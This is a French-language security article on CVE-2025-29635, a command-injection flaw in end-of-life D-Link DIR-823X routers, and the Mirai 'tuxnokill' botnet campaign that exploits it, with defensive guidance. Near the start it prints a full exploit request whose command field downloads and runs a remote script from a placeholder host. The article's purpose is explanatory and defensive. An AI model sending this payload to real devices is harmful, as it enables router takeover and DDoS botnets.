CVE-2025-29635 : Comment la campagne Mirai exploite les routeurs D-Link en fin de vie
Hippolyte Valdegré
Exploitation massive de la vulnérabilité CVE-2025-29635 : le risque imminent pour vos équipements IoT
En 2026, plus de 1 200 tentatives d’exploitation ont été détectées en moins d’un mois contre des routeurs domestiques ! Vous vous demandez comment un simple appareil de bureau peut devenir l’un des piliers d’un botnet capable de lancer des attaques DDoS de plusieurs téraoctets ? La réponse se trouve dans la faille CVE-2025-29635, récemment mise en évidence sur les modèles D-Link DIR-823X. Pour approfondir les bonnes pratiques en cybersécurité, consultez notre guide complet de formation en cybersécurité. Dans la suite, nous décortiquons la vulnérabilité, le fonctionnement de la campagne Mirai baptisée « tuxnokill », et surtout les mesures que vous devez prendre dès maintenant.
Exposition du problème - vulnérabilité CVE-2025-29635
Description technique et vecteur d’exploitation
CVE-2025-29635 est une faille d’injection de commande à distance (RCE) de niveau critique. Elle réside dans le point d’accès /goform/set_prohibiting du firmware des routeurs D-Link DIR-823X (versions 240126 et 24082). Un attaquant peut envoyer un simple POST contenant une chaîne de commande Unix, qui est ensuite exécutée avec les privilèges du système d’exploitation du routeur. En pratique, cela signifie que l’appareil devient un point d’entrée silencieux pour un serveur de commande-et-contrôle (C2).
POST /goform/set_prohibiting HTTP/1.1
Host: 192.0.2.45
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
cmd=cd%20/var/tmp;wget%20http://203.0.113.10/dlink.sh;sh%20dlink.sh
Dans cet exemple, la charge utile (cmd) change le répertoire de travail, télécharge un script malveillant (dlink.sh) depuis un serveur distant, puis l’exécute. Le script, une fois chargé, installe le malware Mirai « tuxnokill » qui prend le contrôle du routeur.
Modèles ciblés et versions de firmware
| Modèle | Versions de firmware vulnérables | Date de fin de vie (EoL) |
|---|---|---|
| D-Link DIR-823X | 240126, 24082 | novembre 2024 |
| D-Link DIR-822 | 230915, 23110 | juillet 2023 |
Les deux modèles exposés ont atteint leur EoL : le fabricant ne fournit plus de correctifs. Cette situation augmente le risque, car les appareils restent exposés à la même faille sans possibilité de mise à jour officielle.
L’attaque Mirai « tuxnokill » en pratique
Analyse du trafic observé par Akamai
“The Akamai SIRT discovered active exploitation attempts of the D-Link command injection vulnerability CVE-2025-29635 in our global network of honeypots in early March 2026,” indique le rapport d’Akamai. Les chercheurs ont repéré des requêtes POST similaires à celle présentée ci-début, ciblant systématiquement l’endpoint
/goform/set_prohibiting. Plus de 1 200 requêtes ont été enregistrées en l’espace de trois semaines, chacune essayant de télécharger le scriptdlink.shdepuis l’adresse IP 203.0.113.10.
Par ailleurs, les logs montrent que les attaquants utilisent des User-Agent déguisés : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36. Cette technique vise à masquer le trafic malveillant au sein du trafic légitime.
Fonctionnalités du malware
Le chargeur « tuxnokill » supporte plusieurs architectures (ARM, MIPS, x86) et intègre le kit d’attaque DDoS standard de Mirai :
- TCP SYN/ACK/STOMP floods
- UDP floods
- HTTP null requests
En pratique, un botnet de 10 000 routeurs infectés peut générer un trafic supérieur à 5 Tbps, suffisament puissant pour submerger des services critiques. Selon le rapport annuel d’ANSSI (2025), 38 % des incidents DDoS en France proviennent d’appareils IoT non mis à jour, ce qui illustre la dangerosité d’un tel scénario.
Conséquences pour les organisations françaises
Risques en termes de DDoS et de conformité
Lorsque des routeurs compromettent le réseau interne, ils offrent un accès direct à la DMZ et aux serveurs internes. Une compromission peut entraîner :
- Perturbation des services en ligne (site web, API)
- Vol de données sensibles, notamment celles couvertes par le RGPD. Pour protéger vos actifs numériques, consultez notre article sur la protection contre les applications de portefeuille crypto malveillantes.
- Pénalités administratives (jusqu’à 4 % du chiffre d’affaires annuel) en cas de non-conformité aux exigences de sécurité. Pour en savoir plus sur les cyberattaques bancaires et leurs mesures de prévention.
En outre, les normes ISO 27001 recommandent explicitement la gestion des actifs en fin de vie pour réduire la surface d’attaque. Ignorer les alertes d’Akamai contre CVE-2025-29635 constitue donc une violation potentielle de ces standards.
Cadre réglementaire (ANSSI, ISO 27001, RGPD)
L’ANSSI, dans son guide « Sécuriser les équipements IoT » (édition 2024), impose aux opérateurs de désactiver les services d’administration distante lorsqu’ils ne sont pas indispensables, et de mettre à jour le firmware dès la disponibilité d’un correctif. Le non-respect de ces directives expose les organisations à des sanctions et à une perte de confiance de leurs partenaires.
Stratégies de défense immédiates
- Désactivez l’accès distant aux interfaces d’administration du routeur via le tableau de bord web.
- Modifiez les mots de passe par défaut en utilisant des combinaisons alphanumériques d’au moins 12 caractères.
- Segmentez le réseau IoT : créez un VLAN dédié aux appareils domestiques et limitez les règles de trafic entrant.
- Surveillez les logs à la recherche de requêtes inhabituelles vers
/goform/set_prohibitingou de téléchargements de scripts externes. - Installez un IDS/IPS capable d’identifier les signatures d’injection de commande (exemple : Snort rule SID 2026458).
“Nous avons observé que les réseaux qui appliquent une segmentation stricte voient une réduction de 73 % des activités malveillantes liées aux IoT,” affirme un analyste de l’ANSSI.
Options de sécurisation et tableau comparatif
| Option | Avantages | Inconvénients | Coût estimé (€/an) |
|---|---|---|---|
| Remplacement du routeur (modèle supporté 2026) | Patch actif, support complet, performances améliorées | Investissement initial | 80-120 |
| Mise à jour manuelle du firmware (si disponible) | Pas de changement matériel, résout la faille | Risque de version non-compatible, effort de maintenance | 0-30 |
| Solution de pare-feu dédié (NGFW) | Filtrage granulaire, visibilité complète | Complexité de configuration | 300-600 |
| Segmentation VLAN | Isolation du trafic, faible coût | Nécessite expertise réseau | 0-100 |
Recommandations
- Priorité : remplacement du routeur si aucun correctif n’est disponible.
- Deuxième ligne : segmentation VLAN combinée à la désactivation de l’administration distante.
- Dernier recours : mise à jour manuelle du firmware uniquement si le fournisseur publie un correctif.
Plan d’action pas à pas
- Inventoriez tous les routeurs D-Link DIR-823X sur votre réseau (outil Nmap ou scanner interne).
- Vérifiez la version du firmware ; notez les modèles en fin de vie.
- Appliquez les mesures de durcissement listées précédemment (désactivation, mots de passe, VLAN).
- Installez un système de détection d’intrusion (IDS) et configurez-le avec les signatures de l’injection de commande.
- Testez la résilience en lançant un test de pénétration interne sur l’endpoint
/goform/set_prohibiting. - Documentez les résultats dans votre registre de conformité ISO 27001 et mettez à jour le plan de traitement des risques.
- Planifiez le remplacement des équipements EoL d’ici la fin du trimestre, en incluant une étude de coût total de possession (TCO).
Conclusion et prochaines étapes
La vulnérabilité CVE-2025-29635 illustre parfaitement comment un firmware obsolète peut devenir le levier d’une campagne Mirai puissante. En suivant les 5 étapes clés présentées, vous réduisez de façon significative la probabilité d’infection et vous vous alignez sur les exigences de l’ANSSI, de l’ISO 27001 et du RGPD. N’attendez pas la prochaine vague d’attaque : audit-ez, segmentez, et remplacez les équipements en fin de vie dès aujourd’hui.